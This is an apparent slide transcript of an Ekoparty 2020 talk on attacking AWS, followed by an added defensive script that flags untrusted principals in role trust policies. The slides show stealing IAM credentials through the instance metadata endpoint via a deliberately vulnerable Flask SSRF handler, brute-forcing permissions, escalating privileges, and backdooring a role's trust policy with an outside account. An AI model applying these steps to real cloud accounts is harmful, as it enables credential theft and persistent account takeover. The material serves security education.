Step by step AWS Cloud Hacking
andresriancho
September 25, 2020
Transcript
Ekoparty 2020 Andrés Riancho
need credentials
IAM permissions
http://169.254.169.254/
/latest/meta-data/iam/security-credentials/
/latest/meta-data/iam/security-credentials/{role-name}

from urllib.request import urlopen
from flask import Flask, request

app = Flask(__name__)

@app.route('/ssrf')
def handler():
    # Fetches whatever URL the caller supplies, with no validation (the SSRF)
    url = request.args.get('url')
    return urlopen(url).read()

Instance metadata and S3 compromise
two ways to enumerate permissions
IAM service
In most cases this will fail
brute-force
Get* / List* / Describe*
DryRun parameter

SUPPORTED_SERVICES = [ 'ec2', 's3' ]

./enumerate-iam.py
many things the attacker doesn't know.

{
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "s3:*",
        "lambda:*",
        "..."
      ],
      "Resource": "*"
    }
  ]
}

try to elevate privileges to a principal with full access

{
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "*"
      ],
      "Resource": "*"
    }
  ]
}

Lambda function will have access to the IAM role
Getting * on *
existing trust policy in the AdminRole

{
  "Effect": "Allow",
  "Principal": {
    "AWS": "arn:aws:iam::925877178748:root"
  },
  "Action": "sts:AssumeRole"
}

{
  "Effect": "Allow",
  "Principal": {
    "AWS": [
      "arn:aws:iam::925877178748:root",
      "arn:aws:iam::320222540496:root"
    ]
  },
  "Action": "sts:AssumeRole"
}

Never trust the trust policy
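An added example, not part of the original slides: a check a defender can run over role trust policies to flag principals from accounts outside an allow-list. The function names and the trusted-account set are assumptions; the sample policies are constructed by wrapping the two statements from the slide in a `Statement` list.

```python
import re
from fnmatch import fnmatchcase

# Matches IAM/STS principal ARNs and captures the 12-digit account ID.
ARN_ACCOUNT = re.compile(r"^arn:aws[a-z-]*:(?:iam|sts)::(\d{12}):")

def _as_list(value):
    return value if isinstance(value, list) else [value]

def principal_accounts(principal):
    """Yield (raw principal, account ID or None) for each AWS principal."""
    if principal == "*":
        yield "*", None
        return
    for raw in _as_list(principal.get("AWS", [])):
        if re.fullmatch(r"\d{12}", raw):
            yield raw, raw
        else:
            match = ARN_ACCOUNT.match(raw)
            yield raw, match.group(1) if match else None

def untrusted_principals(trust_policy, trusted_accounts):
    """Return AWS principals allowed to assume the role from unlisted accounts."""
    findings = []
    for stmt in _as_list(trust_policy.get("Statement", [])):
        actions = [a.lower() for a in _as_list(stmt.get("Action", []))]
        # Covers "sts:AssumeRole" as well as wildcards such as "*" or "sts:*".
        grants_assume = any(fnmatchcase("sts:assumerole", a) for a in actions)
        if stmt.get("Effect") != "Allow" or not grants_assume:
            continue
        for raw, account in principal_accounts(stmt.get("Principal", {})):
            if account not in trusted_accounts:  # "*" and unparsable values are flagged too
                findings.append(raw)
    return findings

def _policy(principals):  # constructed wrapper around the slide's statement
    return {"Statement": [{"Effect": "Allow", "Principal": {"AWS": principals},
                           "Action": "sts:AssumeRole"}]}

# Constructed sample input, using the two statements shown on the slide.
ORIGINAL = _policy("arn:aws:iam::925877178748:root")
BACKDOORED = _policy(["arn:aws:iam::925877178748:root",
                      "arn:aws:iam::320222540496:root"])
TRUSTED = {"925877178748"}  # assumption: the only account expected to assume the role

if __name__ == "__main__":
    for name, doc in (("original", ORIGINAL), ("backdoored", BACKDOORED)):
        print(name, untrusted_principals(doc, TRUSTED))
```

In a real account, the documents to feed in are the `AssumeRolePolicyDocument` fields returned by `aws iam list-roles`.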
ARN for the backdoored role
most resources in the AWS account
VPC is completely isolated from the Internet
VPN between the attacker's workstation and a VPC
vpc-vpn-pivot
From zero to full pwn
• enumerate-iam
• pacu
• vpc-vpn-pivot
Follow @AndresRiancho